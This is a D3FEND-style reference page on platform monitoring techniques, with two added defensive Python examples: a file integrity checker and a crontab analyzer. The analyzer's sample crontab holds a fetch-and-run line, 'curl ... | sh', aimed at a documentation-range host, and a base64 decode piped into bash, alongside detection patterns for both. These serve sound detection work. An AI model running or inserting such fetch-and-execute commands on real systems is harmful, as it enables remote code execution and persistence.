Platform Monitoring
Definition
Monitoring platform components such as operating systems software, hardware devices, or firmware.
Platform monitoring consists of the analysis and monitoring of system level devices and low-level components, including hardware devices, to detect unauthorized modifications or suspicious activity.
Monitored platform components include system files and embedded devices such as:
- Kernel software modules
- Boot process code and load logic
- Operating system components and device files
- System libraries and dynamically loaded files
- Hardware device drivers
- Embedded firmware devices
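The components listed above are typically watched by baselining each file's content digest and ownership/permission bits, then diffing the live system against that baseline. The following is an added example (not D3FEND's own code, and not a reference implementation of any listed technique) of that baseline-and-compare logic as it applies to the File Integrity Monitoring, Service Binary Verification and System File Analysis subclasses: it builds a small constructed "system" tree in a temporary directory, records SHA-256, mode, uid and gid for every regular file, tampers with the tree, and classifies the differences. The directory layout, file names and tampering steps are constructed for the demonstration.

```python
"""Minimal file integrity monitor (added example, not D3FEND code).

Baselines a directory tree (SHA-256 digest, mode, owner) and compares the
live tree against the baseline, reporting files that were added, removed,
modified in content, or whose mode/owner changed while content stayed the
same. The tree and the tampering in demo() are constructed for illustration.
"""
import hashlib
import stat
import tempfile
from pathlib import Path


def _digest(path: Path) -> str:
    """Stream the file so large binaries do not have to be read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Record digest plus permission-relevant metadata for every regular file under root.

    Symlinks are skipped deliberately: following them would let an attacker
    point a monitored name at a benign file while the real target changes.
    """
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_symlink() or not p.is_file():
            continue
        st = p.lstat()
        baseline[p.relative_to(root).as_posix()] = {
            "sha256": _digest(p),
            "mode": stat.S_IMODE(st.st_mode),  # includes setuid/setgid/sticky bits
            "uid": st.st_uid,
            "gid": st.st_gid,
        }
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Diff two snapshots; returns sorted path lists per change class."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified, metadata = [], []
    for name in sorted(set(baseline) & set(current)):
        old, new = baseline[name], current[name]
        if old["sha256"] != new["sha256"]:
            modified.append(name)
        elif (old["mode"], old["uid"], old["gid"]) != (new["mode"], new["uid"], new["gid"]):
            # Same bytes but different permissions/owner: e.g. a setuid bit added.
            metadata.append(name)
    return {"added": added, "removed": removed, "modified": modified, "metadata": metadata}


def demo() -> dict:
    """Construct a toy 'system' tree, baseline it, tamper with it, and re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "lib").mkdir()
        (root / "bin" / "sshd").write_bytes(b"\x7fELF original sshd")   # constructed content
        (root / "lib" / "libc.so").write_bytes(b"\x7fELF libc")
        (root / "etc.conf").write_text("PermitRootLogin no\n")
        (root / "bin" / "sshd").chmod(0o755)
        (root / "lib" / "libc.so").chmod(0o644)
        base = snapshot(root)

        # Simulated tampering (constructed): trojaned service binary, new kernel
        # module dropped in, setuid bit added to a library, config file removed.
        (root / "bin" / "sshd").write_bytes(b"\x7fELF trojaned sshd")
        (root / "lib" / "rootkit.ko").write_bytes(b"\x7fELF module")
        (root / "lib" / "libc.so").chmod(0o4755)
        (root / "etc.conf").unlink()
        return compare(base, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

In production the baseline would be stored and verified out of band (signed, or on a host the monitored system cannot write to), since a baseline kept on the monitored host can simply be rewritten by the same intruder who modified the files.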
Technique Subclasses
There are 22 techniques in this category, Platform Monitoring.
| Name | ID | Definition | Synonyms |
|---|---|---|---|
| Platform Monitoring | D3-PM | Monitoring platform components such as operating systems software, hardware devices, or firmware. | |
| - Application Performance Monitoring | D3-APM | Monitoring the count and duration of the application or program cycle. | |
| - File Integrity Monitoring | D3-FIM | Detecting any suspicious changes to files in a computer system. | |
| - Service Binary Verification | D3-SBV | Analyzing changes in service binary files by comparing to a source of truth. | |
| - User Session Init Config Analysis | D3-USICA | Analyzing modifications to user session config files such as .bashrc or .bash_profile. | User Startup Config Analysis |
| - Platform Uptime Monitoring | D3-PUM | Monitor the amount of time since the last power cycle or restart. | |
| - System Daemon Monitoring | D3-SDM | Tracking changes to the state or configuration of critical system level processes. | |
| - Operating Mode Monitoring | D3-OMM | Detects operating modes such as Program, Run, Remote, or Stop. | |
| - Application Exception Monitoring | D3-AEM | Monitoring the failures of system counters and timers. | Application Failure Monitoring |
| - Scheduled Job Analysis | D3-SJA | Analysis of source files, processes, destination files, or destination servers associated with a scheduled job to detect unauthorized use of job scheduling. | Scheduled Job Execution |
| - Peripheral Firmware Verification | D3-PFV | Cryptographically verifying peripheral firmware integrity. | |
| - Firmware Embedded Monitoring Code | D3-FEMC | Monitoring code is injected into firmware for integrity monitoring of firmware and firmware data. | |
| - Firmware Verification | D3-FV | Cryptographically verifying firmware integrity. | |
| - Operating System Monitoring | D3-OSM | The operating system software, for D3FEND's purposes, includes the kernel and its process management functions, hardware drivers, and initialization or boot logic. It also includes other key system daemons and their configuration. The monitoring or analysis of these components for unauthorized activity constitutes **Operating System Monitoring**. | |
| - System File Analysis | D3-SFA | Monitoring system files such as authentication databases, configuration files, system logs, and system executables for modification or tampering. | |
| - System Firmware Verification | D3-SFV | Cryptographically verifying installed system firmware integrity. | |
| - Input Device Analysis | D3-IDA | Operating system level mechanisms to prevent abusive input device exploitation. | |
| - Memory Boundary Tracking | D3-MBT | Analyzing a call stack for return addresses which point to unexpected memory locations. | |
| - Operational Process Monitoring | D3-OPM | Monitoring physical parameters and operator actions related to an operational environment. | Supervisory Control Monitoring |
| - Firmware Behavior Analysis | D3-FBA | Analyzing the behavior of embedded code in firmware and looking for anomalous behavior and suspicious activity. | Firmware Timing Analysis |
| - Endpoint Health Beacon | D3-EHB | Monitoring the security status of an endpoint by sending periodic messages with health status, where absence of a response may indicate that the endpoint has been compromised. | Endpoint Health Telemetry |
| - System Init Config Analysis | D3-SICA | Analysis of any system process startup configuration. | Startup Analysis, Autorun Analysis |
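Several of the subclasses above (Scheduled Job Analysis, System Init Config Analysis, User Session Init Config Analysis) come down to parsing a startup or scheduling configuration and flagging entries that should not be there. As an added example, not D3FEND's code and not a definition of any listed technique, the block below parses crontab-style lines and applies a few illustrative heuristics: commands that run from temporary or world-writable directories, commands that fetch remote content and pipe it into a shell, and commands that decode a base64 payload inline. The sample crontab, the directory list and the heuristics are all constructed assumptions for the demonstration.

```python
"""Scheduled job / startup config analysis (added example, not D3FEND code).

Parses crontab-style lines (five-field schedules and @-aliases) and flags
entries matching simple, assumed heuristics. The sample crontab below is
constructed; the host address in it is a documentation-range address.
"""
import re

# Assumed heuristics for illustration only.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
B64_DECODE = re.compile(r"\bbase64\s+(-d|--decode)\b")

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /tmp/.x/update.sh
@reboot curl -s http://198.51.100.7/a.sh | sh
0 * * * * echo aGVsbG8= | base64 -d | bash
"""


def parse_crontab(text: str) -> list:
    """Return (line_number, schedule, command) for each job line.

    Skips blank lines, comments and VAR=value environment assignments.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                     # @reboot, @daily, ...
            parts = line.split(None, 1)
            if len(parts) != 2:
                continue
            schedule, command = parts
        else:
            parts = line.split(None, 5)              # m h dom mon dow command
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((lineno, schedule, command))
    return entries


def analyze_command(command: str) -> list:
    """Return the list of heuristic reasons a command looks suspicious (empty if none)."""
    reasons = []
    if any(d in command for d in SUSPICIOUS_DIRS):
        reasons.append("executes from temp/world-writable directory")
    if PIPE_TO_SHELL.search(command):
        reasons.append("downloads remote content and pipes it to a shell")
    if B64_DECODE.search(command):
        reasons.append("decodes a base64 payload inline")
    return reasons


def find_suspicious(text: str) -> list:
    """Return (line_number, command, reasons) for every flagged job entry."""
    flagged = []
    for lineno, _schedule, command in parse_crontab(text):
        reasons = analyze_command(command)
        if reasons:
            flagged.append((lineno, command, reasons))
    return flagged


if __name__ == "__main__":
    for lineno, command, reasons in find_suspicious(SAMPLE_CRONTAB):
        print(f"line {lineno}: {command}\n    {'; '.join(reasons)}")
```

Heuristics like these catch the obvious cases only; a complete implementation would also diff the parsed entries against a known-good baseline and resolve each command path to check its owner and hash, as the integrity monitor earlier on this page does for files.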
Related ATT&CK Techniques:
These mappings are inferred, experimental, and will improve as the knowledge graph grows. The offensive techniques below, grouped by ATT&CK tactic, are considered related through the artifacts this defensive technique monitors.
Lateral Movement
- Software Deployment Tools
- Exploitation of Remote Services
- Internal Spearphishing
Privilege Escalation
- Abuse Elevation Control Mechanism
- Process Injection
- Boot or Logon Initialization Scripts
- Boot or Logon Autostart Execution
- Exploitation for Privilege Escalation
- Event Triggered Execution
- Hijack Execution Flow
- Create or Modify System Process
- Scheduled Task/Job
- Access Token Manipulation
Command and Control
- Encrypted Channel
- Application Layer Protocol
Impact
- Data Encrypted for Impact
- Data Manipulation
Collection
- Audio Capture
- Input Capture
- Automated Collection
- Video Capture
- Data Staged
- Archive Collected Data
- Data from Local System
- Email Collection
Discovery
- System Network Configuration Discovery
- Remote System Discovery
- System Owner/User Discovery
- File and Directory Discovery
Persistence
- Boot or Logon Initialization Scripts
- Office Application Startup
- Boot or Logon Autostart Execution
- Event Triggered Execution
- Hijack Execution Flow
- Server Software Component
- Modify Authentication Process
- Create or Modify System Process
- Scheduled Task/Job
- Pre-OS Boot
Execution
- Exploitation for Client Execution
- Software Deployment Tools
- User Execution
- Command and Scripting Interpreter
- Scheduled Task/Job
Credential Access
- Exploitation for Credential Access
- Input Capture
- Brute Force
- Unsecured Credentials
- Modify Authentication Process
- OS Credential Dumping
- Forced Authentication
- Credentials from Password Stores
- Steal or Forge Authentication Certificates
Defense Evasion
- Abuse Elevation Control Mechanism
- Indicator Removal
- Masquerading
- Process Injection
- System Binary Proxy Execution
- Obfuscated Files or Information
- Hide Artifacts
- Trusted Developer Utilities Proxy Execution
- Hijack Execution Flow
- Deobfuscate/Decode Files or Information
- Modify Authentication Process
- Modify Cloud Compute Infrastructure
- Exploitation for Defense Evasion
- Rootkit
- Impair Defenses
- Pre-OS Boot
- Access Token Manipulation
- XSL Script Processing
Exfiltration
- Exfiltration Over C2 Channel
- Exfiltration Over Alternative Protocol